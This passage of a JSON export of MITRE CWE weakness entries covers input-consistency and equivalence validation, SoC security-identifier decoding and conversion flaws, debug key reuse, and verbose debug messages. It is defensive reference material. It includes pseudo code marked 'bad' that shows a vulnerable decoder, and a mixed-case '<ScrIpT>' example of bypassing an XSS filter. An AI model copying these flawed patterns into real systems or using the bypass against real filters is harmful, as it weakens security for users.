business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1288":{"attr":{"@_ID":"1288","@_Name":"Improper Validation of Consistency within Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.","Extended_Description":{"xhtml:p":"Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements.  When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16733","Description":"product does not validate that the start block appears before the end block","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16733"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1289":{"attr":{"@_ID":"1289","@_Name":"Improper Validation of Unsafe Equivalence in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value.","Extended_Description":{"xhtml:p":"Attackers can sometimes bypass input validation schemes by finding inputs that appear to be safe, but will be dangerous when processed at a lower layer or by a downstream component.  For example, a simple XSS protection mechanism might try to validate that an input has no \\"&lt;script&gt;\\" tags using case-sensitive matching, but since HTML is case-insensitive when processed by web browsers, an attacker could inject \\"&lt;ScrIpT&gt;\\" and trigger XSS."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"178","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1290":{"attr":{"@_ID":"1290","@_Name":"Incorrect Decoding of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections.","A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent\u2019s security identifier is decoded into a trusted agent\u2019s security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design consistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that has four bus masters and a decoder. The table below provides bus masters as well as their security identifiers and trust assumptions:","The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets.","The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier in formation.","The assets are the AES-Key register\u2019s AES key for encryption or decryption. The key is128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.\\nThe access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The size of the security identifier is 4 bits (i.e., bit 3 through 0. Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent."],"xhtml:table":[{"xhtml:tr":[{"xhtml:td":["Bus Master","Security Identifier Decoding","Trust Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:td":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000\\n[3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}],"xhtml:br":"","xhtml:div":{"#text":"Pseudo CodeIf (AES_KEY_ACCESS_POLICY[Security_Identifier] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Below is a decoder\u2019s Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign.If (Bus_transaction[14] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code:If (Bus_transaction[15:14] == \u201c00\u201d)If (Bus_transaction[15:14] == \u201c01\u201d)If (Bus_transaction[15:14] == \u201c10\u201d)If (Bus_transaction[15:14] == \u201c11\u201d)","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c2\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c3\u201d","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Upon close observation of the security identifiers and the above code, it looks like the Master_3, an untrusted agent, has access to the AES-Key registers in addition to the intended trusted Master_1 because both have their bit \u201c0\u201d set to \u201c1\u201d."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1291":{"attr":{"@_ID":"1291","@_Name":"Public Key Re-Use for Signing both Debug and Production Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The same public key is used for signing both debug and production code.","Extended_Description":{"xhtml:p":["A common usage of public-key cryptography is to verify the integrity and authenticity of another entity (for example a firmware binary). If a company wants to ensure that its firmware runs only on its own hardware, before the firmware runs, an encrypted hash of the firmware image will be decrypted with the public key and then verified against the now-computed hash of the firmware image. This means that the public key forms the root of trust, which necessitates that the public key itself must be protected and used properly.","During the development phase, debug firmware enables many hardware debug hooks, debug modes, and debug messages for testing. Those debug facilities provide significant, additional views about the firmware\u2019s capability and, in some cases, additional capability into the chip or SoC. If compromised, these capabilities could be exploited by an attacker to take full control of the system.","Once the product exits the manufacturing stage and enters production, it is good practice to use a different public key. Debug firmware images are known to leak. With the debug key being reused as the production key, the debug image will also work on the production image. Thus, it will open all the internal, debug capabilities to the attacker.","If a different public key is used for the production image, even if the attacker gains access to the debug firmware image, they will not be able to run it on a production machine. Thus, damage will be limited to the intellectual property leakage resulting from the debug image."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation","Other"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use different keys for Production and Debug"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example illustrates the danger of using the same public key for debug and production.","Example_Code":[{"#text":"Suppose the product design requires frugality of silicon real estate. Assume that originally the architecture allows just enough storage for two 2048-bit RSA keys in the fuse: one to be used for debug and the other for production. However, in the meantime, a business decision is taken to make the security future-proof beyond 2030, which means the architecture needs to use the NIST-recommended 3072-bit keys instead of the originally-planned 2048-bit keys. This means that, at most, one key can be fully stored in the fuses, not two. So the product design team decides to use the same public key for debug and production.","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":""},{"#text":"Increase the storage so that two different keys of the required size can be stored.","attr":{"@_Nature":"informative","@_Language":"Other"},"xhtml:div":""}]}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-26"}}},"1292":{"attr":{"@_ID":"1292","@_Name":"Incorrect Conversion of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes).","A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other.","A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP.","The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when \u201cSet\u201d allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used.","During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["Register","Field Description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000 [3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},"Example_Code":[{"#text":"In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1293":{"attr":{"@_ID":"1293","@_Name":"Missing Source Correlation of Multiple Independent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software relies on one source of data, preventing the ability to detect if an adversary has compromised a data source.","Extended_Description":{"xhtml:p":"Software has to implicitly trust the integrity of an information source. When information is implicitly signed, one can ensure that the data was not tampered in transit. This does not ensure that the information source was not compromised when responding to a request. By requesting information from multiple sources, one can check if all of the data is the same. If they are not, the system should report the information sources that respond with a different or minority value as potentially compromised. If there are not enough answers to provide a majority or plurality of responses, the system should report all of the sources as potentially compromised. As the seriousness of the impact of incorrect integrity increases, so should the number of independent information sources that would need to be queried."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"654","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This flaw could be introduced during the design of the application or misconfiguration at run time by only specifying a single point of validation."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."},{"Phase":"Operation","Note":"This weakness could be introduced by intentionally failing all but one of the devices used to retrieve the data or by failing the devices that validate the data."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker that may be able to execute a single Person-in-the-Middle attack can subvert a check of an external oracle (e.g. the ACME protocol check for a file on a website), and thus inject an arbitrary reply to the single perspective request to the external oracle."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Design system to use a Practical Byzantine fault method, to request information from multiple sources to verify the data and report on potentially compromised information sources."},{"Phase":"Implementation","Description":"Failure to use a Practical Byzantine fault method when requesting data. Lack of place to report potentially compromised information sources. Relying on non-independent information sources for integrity checking. Failure to report information sources that respond in the minority to incident response procedures."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1125"}},{"attr":{"@_External_Reference_ID":"REF-1126"}},{"attr":{"@_External_Reference_ID":"REF-1127"}}]},"Content_History":{"Submission":{"Submission_Name":"Kurt Seifried","Submission_Organization":"Cloud Security Alliance","Submission_Date":"2020-04-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"}}},"1294":{"attr":{"@_ID":"1294","@_Name":"Insecure Security Identifier Mechanism","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.","Extended_Description":{"xhtml:p":["Systems-On-Chip (Integrated circuits and hardware\\n                    engines) implement Security Identifiers to\\n                    differentiate/identify actions originated from various\\n                    agents. These actions could be \'read\', \'write\', \'program\',\\n                    \'reset\', \'fetch\', \'compute\', etc. Security identifiers are\\n                    generated and assigned to every agent in the System (SoC)\\n                    that is either capable of generating an action or receiving\\n                    an action from another agent. Every agent could be assigned\\n                    a unique, Security Identifier based on its trust level or\\n                    privileges.","A broad class of flaws can exist in the Security\\n                    Identifier process, including but not limited to missing\\n                    security identifiers, improper conversion of security\\n                    identifiers, incorrect generation of security identifiers,\\n                    etc."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-07-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1295":{"attr":{"@_ID":"1295","@_Name":"Debug Messages Revealing Unnecessary Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages.","Extended_Description":{"xhtml:p":"Debug messages are messages that help troubleshoot an issue by revealing the internal state of the system. For example, debug data in design can be exposed through internal memory array dumps or boot logs through interfaces like UART via TAP commands, scan chain, etc. Thus, the more information contained in a debug message, the easier it is to debug. However, there is also the risk of revealing information that could help an attacker either decipher a vulnerability, and/or gain a better understanding of the system. Thus, this extra information could lower the \u201csecurity by obscurity\u201d factor. While \u201csecurity by obscurity\u201d alone is insufficient, it can help as a part of \u201cDefense-in-depth\u201d."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that a debug message does not reveal any unnecessary information during the debug process for the intended response."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example here shows how an attacker can take advantage of unnecessary information in debug messages.","Body_Text":["Example 1: Suppose in response to a Test Access Port (TAP) chaining request the debug message also reveals the current TAP hierarchy (the full topology) in addition to the success/failure message.","Example 2: In response to a password-filling request, the debug message, instead of a simple Granted/Denied response, prints an elaborate message, \u201cThe user-entered password does not match the actual password stored in &lt;directory name&gt;.\u201d","The result of the above examples is that the user is able to gather additional unauthorized information about the system from the debug messages.","The solution is to ensure that Debug messages do not reveal additional details."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-18326","Description":"modem debug messages include cryptographic 